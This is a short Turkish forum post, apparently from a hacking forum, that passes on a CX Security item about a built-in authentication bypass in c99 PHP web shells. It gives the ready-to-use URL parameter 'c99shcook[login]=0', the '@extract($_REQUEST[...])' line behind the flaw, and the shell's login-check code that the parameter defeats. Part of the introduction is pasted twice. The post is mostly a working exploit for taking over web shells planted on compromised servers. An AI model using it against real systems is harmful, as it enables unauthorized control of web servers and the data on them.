cLowN
Forumdan Uzaklaştırıldı
- Katılım
- 15 Eki 2013
- Mesajlar
- 231
- Tepkime puanı
- 0
- Puanları
- 0
Merhaba arkadaşlar, CX Security'de gezerken bu exploit'i gördüm.
Ben direk size ingilizceyi çevireceğim ordaki yazandan
-----------------
Tüm c99 shellerin backdoor özelliği vardır. Kullanıcı girişini bypass etmek için URL'ye (?c99shcook[login]=0) bunu eklemeliyiz.
Örnek:
Backdoor:
Ben direk size ingilizceyi çevireceğim ordaki yazandan
-----------------
Tüm c99 shellerin backdoor özelliği vardır. Kullanıcı girişini bypass etmek için URL'ye (?c99shcook[login]=0) bunu eklemeliyiz.
Örnek:
Kod:
http://127.0.0.1/c99.php?c99shcook[login]=0
Backdoor:
PHP:
@extract($_REQUEST["c99shcook"]);
Which bypasses the authentication here:
if ($login) {
if (empty($md5_pass)) {
$md5_pass = md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) {
if ($login_txt === false) {
$login_txt = "";
} elseif (empty($login_txt)) {
$login_txt = strip_tags(ereg_replace(" |<br>", " ", $donated_html));
}
header("WWW-Authenticate: Basic realm=\"c99shell " . $shver . ": " . $login_txt .
"\"");
header("HTTP/1.0 401 Unauthorized");
exit($accessdeniedmess);
}
}